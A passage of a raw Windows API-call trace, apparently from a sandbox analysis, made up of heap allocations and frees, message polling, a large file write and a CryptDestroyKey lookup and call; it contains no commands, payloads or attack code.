| out: hHeap=0x25c0000) returned 1 [0166.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0166.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0166.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0166.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0166.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0166.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13100) returned 0x34b2250 [0166.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.112] WriteFile (in: hFile=0x170, lpBuffer=0x34b2250*, nNumberOfBytesToWrite=0x13100, lpNumberOfBytesWritten=0x8bf5ec, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesWritten=0x8bf5ec*=0x13100, lpOverlapped=0x0) returned 1 [0166.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0166.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0166.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0166.115] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0166.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0166.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0166.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0166.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0166.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0166.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0166.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.115] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0166.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0166.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0166.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0166.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0166.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0166.116] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0166.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0166.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0166.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0166.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0166.117] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0166.117] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0166.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0166.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0166.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0166.118] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.118] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0166.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0166.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0166.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0166.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0166.119] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0166.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0166.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0166.119] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0166.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0166.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0166.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0166.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0166.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0166.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0166.119] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0166.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0166.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0166.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0166.120] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0166.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.120] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0166.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0166.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0166.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0166.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0166.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0166.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0166.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0166.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0166.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0166.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0166.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0166.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0166.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0166.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0166.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0166.121] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0166.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0166.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0166.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0166.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0166.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0166.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0166.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0166.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x34aa5b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0166.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.122] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyKey") returned 0x74d4c51a [0166.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0166.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.123] CryptDestroyKey (hKey=0xaa5660) returned 1 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0166.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0166.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: 